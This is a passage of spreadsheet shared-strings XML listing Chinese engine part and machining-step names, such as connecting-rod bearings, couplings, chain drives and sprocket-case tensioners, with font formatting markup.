        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铅</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承盖预加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承体预加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承瓦上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承瓦镗孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承下瓦</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承预加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴的装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴瓦上部毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴瓦下部毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接包</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接侧壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接侧上的盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接插头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接插头组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接件，干洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接件再加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CONNETION PIECE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>？</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接螺母扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接螺柱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接配件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接箱，移动感应器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接中间冷却器的空气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接组</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>INFI</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连锁电磁阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联合调查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节带喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节法兰，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节法兰机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节法兰螺帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节法兰螺帽，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节螺栓环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器本体，十字式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器本体，弯式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器本体，直式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器端盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器法兰箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>从联轴器反馈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器基础安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器基础总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器气缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器气缸机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器牙齿安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器油管法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器油管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器轴粗加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链安装和调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链安装用导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动，润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动的装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动和导杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动和凸轮轴工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动局部组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链导轨</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链节</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链节</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间的</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮毂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮检查</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮驱动，滑油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮上的衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮箱</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮箱的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮箱放气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮箱检查及标记</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮箱起吊工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮箱体及盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮张紧器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮涨紧器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮涨紧器定距块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链驱动的布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链驱动润滑上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链驱动润滑下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链驱动上部加工说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链驱动下部部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链试验规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条标记</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条标签</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条箱滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条张紧器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条张紧器的附加部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条张紧器液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条涨紧器数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条组装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链张紧装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>BUSH IN HALVES</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t/>
    </r>
